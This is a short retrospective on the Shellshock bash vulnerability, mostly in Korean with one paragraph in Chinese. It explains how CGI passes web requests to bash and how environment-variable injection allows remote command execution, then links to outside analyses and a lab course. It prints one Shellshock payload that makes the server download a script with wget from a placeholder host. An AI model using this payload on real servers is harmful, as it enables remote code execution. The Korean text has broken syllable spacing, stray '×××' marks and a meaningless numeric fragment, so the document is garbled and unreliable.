셸 쇼크 구멍 회고

review
4. 567917. 포 지 셔 닝 구멍 의 원인 은 일부 대기업 들 이 uCGI 기술 의 보급 이 잘못 이 라 고 생각 하기 때문이다. 바로 CGI 기술 의 불합리 성 때문에 Shellshock 이 이용 할 수 있 는 기회 가 있 기 때문이다

CGI技术是Web技术刚兴起的时候发明的，它是最早的可以创建动态网页内容的技术之一。它会把一个HTTP请求转化为一次shell调用。CGI (Common Gateway Interface)，是一种基于浏览器的输入，在Web服务器上运行程序的方法。

위험 예측
처음에는 이것 이 단지 로 컬 실행 의 구멍 이 라 고 생각 했다.뒤에서 발견 하면 원 격 으로 도 가능 합 니 다.×××.
원 거리×××면: 바로 배경 처리 프로그램 이 PHP, Python, Perl 등 스 크 립 트 로 요청, 해석, 실행, 응답 클 라 이언 트 를 받 아들 일 수 있 을 뿐만 아니 라 사용자 가 제출 한 GET 나 POST 요청 을 Bash 스 크 립 트 로 해석 할 수 있 기 때 문 입 니 다.
Bash 구멍 은 사실 굉장히 고전적 인 '주입 식' 입 니 다.×××”,즉, bash 에 명령 을 주입 할 수 있 습 니 다. bash 1.14 부터 4.3 까지 이러한 구멍 이 있 습 니 다.

() { :;}; wget http://www.XXX.com/testvul.sh

Bash 스 크 립 트 를 이용 하여 사용자 요청 을 처리 하 는 사이트 에 대해 서 는×××데 이 터 를 정성 들 여 조작 하여 네트워크 를 통 해 서버 에 전송 하고 bash 스 크 립 트 를 직접 또는 간접 적 으로 터치 하면 악성 코드 를 원 격 으로 실행 할 수 있 습 니 다.
특정 형식의 명령 을 통 해 환경 변 수 를 설정 하고 bash 스 크 립 트 를 실행 할 때 우리 가 설정 한 환경 변 수 를 먼저 실행 합 니 다.
셸 쇼크 분석 및 회고:http://www.myhack58.com/Article/html/3/8/2014/54877_13.htm
셸 쇼크 실제 안건 열:
http://www.freebuf.com/articles/system/45390.html
×××전제: 구멍 이 있 는 기계 에서 우리 의 bash 코드 를 실행 해 야 합 니 다.
과정 참고:https://www.shiyanlou.com/courses/230